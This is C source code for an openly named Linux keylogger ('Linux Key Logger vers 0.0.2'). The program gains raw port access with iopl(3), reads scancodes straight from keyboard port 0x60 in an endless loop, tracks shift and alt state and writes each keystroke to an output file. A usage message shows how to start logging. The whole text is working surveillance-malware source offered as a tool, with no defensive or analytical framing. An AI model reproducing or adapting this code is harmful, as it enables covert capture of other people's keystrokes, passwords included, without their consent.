#include "lkl.h"

void start_log(char outfile[])
{
  int pressed_shift, pressed_alt;
  unsigned char c, table[TABLE_SIZE];
  
  c = pressed_shift = pressed_alt = 0;
  bzero(table, TABLE_SIZE);

  if(iopl(3) == -1){
    perror("iopl()");
    exit(1);
  }

  while(1){
    c = inb(KEYBOARD_PORT);
    if(c < TABLE_SIZE){
      if(table[c] != 1){
	if((c == 42) || (c == 54)) pressed_shift = 1;
	if(c == 56) pressed_alt = 1;
	do_output(c, outfile, pressed_shift, pressed_alt);
	fflush(0);
      }
      table[c] = 1;
    }else{  
      table[c & ANTIPAIR] = 0; //&127 delete the pair bit

      if((table[42] == 0) && (table[54] == 0)) pressed_shift = 0;
      /*if(table[56] == 0)*/ pressed_alt = 0;//mouse-bug...i'm sorry about that
    }
    usleep(MSEC); //Don't freeze your system, dude :P
  }
  
}

void usage()
{
  printf("\n-- Linux Key Logger vers 0.0.2 --\n");
  printf("\tusage:\n");
  printf("\t\t-h this help\n");
  printf("\t\t-l start to log the 0x60 port (keyboard)\n");
  printf("\t\t-k <km_file> set a keymap file\n");
  printf("\t\t-o <o_file> set an output file\n");
  printf("\nExample: lkl -l -k keymaps/it_km -o log.file\n\n");
}
